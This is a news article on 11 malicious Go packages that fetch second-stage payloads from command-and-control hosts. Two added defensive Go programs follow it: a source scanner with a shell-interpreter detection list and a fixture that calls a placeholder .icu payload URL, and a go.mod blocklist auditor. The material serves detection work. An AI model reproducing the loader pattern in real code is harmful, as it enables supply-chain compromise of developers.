Discovery of Malicious Go Packages Exposes Supply Chain Vulnerabilities

Cybersecurity researchers have uncovered a set of 11 malicious Go packages capable of covertly downloading and executing harmful payloads on both Windows and Linux systems. The malware, identified by Socket's Olivia Brown, stays stealthy by spawning a shell that retrieves second-stage payloads from various command-and-control endpoints, specifically on .icu and .tech domains.
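The two behaviours this paragraph describes, a shell spawned from Go code and hard-coded endpoints on .icu and .tech domains, can be looked for with a static check over Go source before a module is built. The program below is an added example, not code from the report or from Socket; the detector rules, the `ScanSource` function and the `SampleSource` fixture (whose hostname is a placeholder, not a real indicator) are my own assumptions about what such a check looks like.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"net/url"
	"strconv"
	"strings"
)

// shellInterpreters are the program names whose use as the first argument of
// exec.Command is flagged for review (assumed list, not from the report).
var shellInterpreters = map[string]bool{
	"sh": true, "/bin/sh": true, "bash": true, "/bin/bash": true,
	"cmd": true, "cmd.exe": true, "powershell": true, "powershell.exe": true,
}

// suspiciousTLDs are the top-level domains the report associates with the
// command-and-control endpoints.
var suspiciousTLDs = []string{".icu", ".tech"}

// Hit is one flagged location in the scanned file.
type Hit struct {
	Line   int    // 1-based source line
	Kind   string // "shell-spawn" or "c2-tld"
	Detail string // interpreter name or hostname
}

// ScanSource parses one Go file and reports shell spawns and hard-coded URLs on
// the suspicious TLDs. It inspects string literals only, so a loader that
// assembles its strings at run time needs dynamic analysis instead.
func ScanSource(filename, src string) ([]Hit, error) {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var hits []Hit
	ast.Inspect(file, func(n ast.Node) bool {
		switch x := n.(type) {
		case *ast.CallExpr:
			if name, ok := shellSpawnTarget(x); ok {
				hits = append(hits, Hit{fset.Position(x.Pos()).Line, "shell-spawn", name})
			}
		case *ast.BasicLit:
			if s, err := strconv.Unquote(x.Value); err == nil && x.Kind == token.STRING {
				if host, ok := suspiciousHost(s); ok {
					hits = append(hits, Hit{fset.Position(x.Pos()).Line, "c2-tld", host})
				}
			}
		}
		return true
	})
	return hits, nil
}

// shellSpawnTarget returns the program name when call is exec.Command(...)
// with a literal shell interpreter as its first argument.
func shellSpawnTarget(call *ast.CallExpr) (string, bool) {
	sel, ok := call.Fun.(*ast.SelectorExpr)
	if !ok || sel.Sel.Name != "Command" || len(call.Args) == 0 {
		return "", false
	}
	if pkg, ok := sel.X.(*ast.Ident); !ok || pkg.Name != "exec" {
		return "", false
	}
	lit, ok := call.Args[0].(*ast.BasicLit)
	if !ok || lit.Kind != token.STRING {
		return "", false
	}
	name, err := strconv.Unquote(lit.Value)
	if err != nil || !shellInterpreters[strings.ToLower(name)] {
		return "", false
	}
	return name, true
}

// suspiciousHost returns the hostname when s is an absolute URL on a listed TLD.
func suspiciousHost(s string) (string, bool) {
	u, err := url.Parse(s)
	if err != nil || u.Host == "" {
		return "", false
	}
	host := strings.ToLower(u.Hostname())
	for _, tld := range suspiciousTLDs {
		if strings.HasSuffix(host, tld) {
			return host, true
		}
	}
	return "", false
}

// SampleSource is a constructed file shaped like the loader the report
// describes; the hostname is a placeholder, not a real indicator.
const SampleSource = `package loader

import (
	"net/http"
	"os/exec"
)

func stage() {
	_, _ = http.Get("https://c2-placeholder.icu/payload")
	_ = exec.Command("sh", "-c", "echo placeholder").Run()
}
`

func main() {
	hits, _ := ScanSource("sample.go", SampleSource)
	for _, h := range hits {
		fmt.Printf("line %d: %s (%s)\n", h.Line, h.Kind, h.Detail)
	}
}
```

Run against a vendored module tree, one file at a time, this gives a review queue rather than a verdict: a shell spawn is legitimate in plenty of build tooling, and the report notes the real loader is obfuscated, so a clean scan is not proof of a clean module.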

The malicious packages include github.com/stripedconsu/linker, github.com/agitatedleopa/stm and github.com/expertsandba/opt, among others. These packages harbor an obfuscated loader that fetches additional ELF and Portable Executable (PE) binaries, which seek to collect host information and access sensitive web browser data.
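The module paths named here are the indicators a defender can act on immediately: any `go.mod` that requires one of them, directly or transitively, is a build host at risk. The program below is an added example, not code from the report or from Socket; it parses `go.mod` text with the standard library and matches it against the three paths the article names. The blocklist is deliberately incomplete (the report counts 11 packages), and the `SampleGoMod` fixture with its versions and benign module is constructed for the demonstration.

```go
package main

import (
	"bufio"
	"fmt"
	"sort"
	"strings"
)

// knownMaliciousModules holds the three module paths named in the report.
// The report counts 11 packages, so this list must be extended from the
// full advisory before it is relied on.
var knownMaliciousModules = map[string]bool{
	"github.com/stripedconsu/linker": true,
	"github.com/agitatedleopa/stm":   true,
	"github.com/expertsandba/opt":    true,
}

// Finding is one dependency that matched the blocklist.
type Finding struct {
	Module, Version, Reason string
}

// ParseRequires extracts module -> version from go.mod text. It handles the
// single-line form `require m v1.0.0` and the block form `require ( ... )`,
// and keeps `// indirect` entries: a transitive dependency still runs at
// build time, so it is just as relevant to this audit.
func ParseRequires(gomod string) map[string]string {
	deps := map[string]string{}
	inBlock := false
	sc := bufio.NewScanner(strings.NewReader(gomod))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if i := strings.Index(line, "//"); i >= 0 { // drop trailing comments
			line = strings.TrimSpace(line[:i])
		}
		switch {
		case line == "":
			continue
		case line == "require (":
			inBlock = true
			continue
		case inBlock && line == ")":
			inBlock = false
			continue
		}
		f := strings.Fields(line)
		switch {
		case inBlock && len(f) == 2:
			deps[f[0]] = f[1]
		case !inBlock && len(f) == 3 && f[0] == "require":
			deps[f[1]] = f[2]
		}
	}
	return deps
}

// AuditGoMod returns the dependencies whose module path is on the blocklist,
// sorted by module path so the output is stable.
func AuditGoMod(gomod string) []Finding {
	var out []Finding
	for mod, ver := range ParseRequires(gomod) {
		if knownMaliciousModules[mod] {
			out = append(out, Finding{mod, ver, "module path named in the Socket report"})
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Module < out[j].Module })
	return out
}

// SampleGoMod is a constructed go.mod used only to exercise the audit; the
// versions and the benign module are placeholders.
const SampleGoMod = `module example.com/app

go 1.22

require (
	github.com/agitatedleopa/stm v0.1.0 // indirect
	example.com/benign/lib v1.4.2
)

require github.com/expertsandba/opt v1.0.0
`

func main() {
	for _, f := range AuditGoMod(SampleGoMod) {
		fmt.Printf("%s %s: %s\n", f.Module, f.Version, f.Reason)
	}
}
```

A `go.mod` only lists what the module itself requires; to cover the resolved graph, including modules pulled in by dependencies that are not pruned into the file, feed the output of `go list -m all` through the same blocklist, and run the check in CI on every build host rather than only on developer machines.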

According to Brown, the malicious capabilities of these packages extend to both Linux build servers and Windows workstations, amplifying their threat and potential for widespread compromise. The decentralized structure of the Go ecosystem complicates matters: developers often import modules directly from GitHub repositories, which can lead to confusion when searching for the legitimate package on platforms like pkg.go.dev.

The threat actor behind these packages appears to be operating alone, a conclusion drawn from similarities in the command-and-control structure and code format. The incident underscores the significant supply chain risk that the cross-platform nature of the Go programming language creates. Coinciding findings add further complexity: two npm packages, naya-flore and nvlore-hsc, pose as WhatsApp socket libraries yet contain functionality capable of executing harmful commands on developer systems.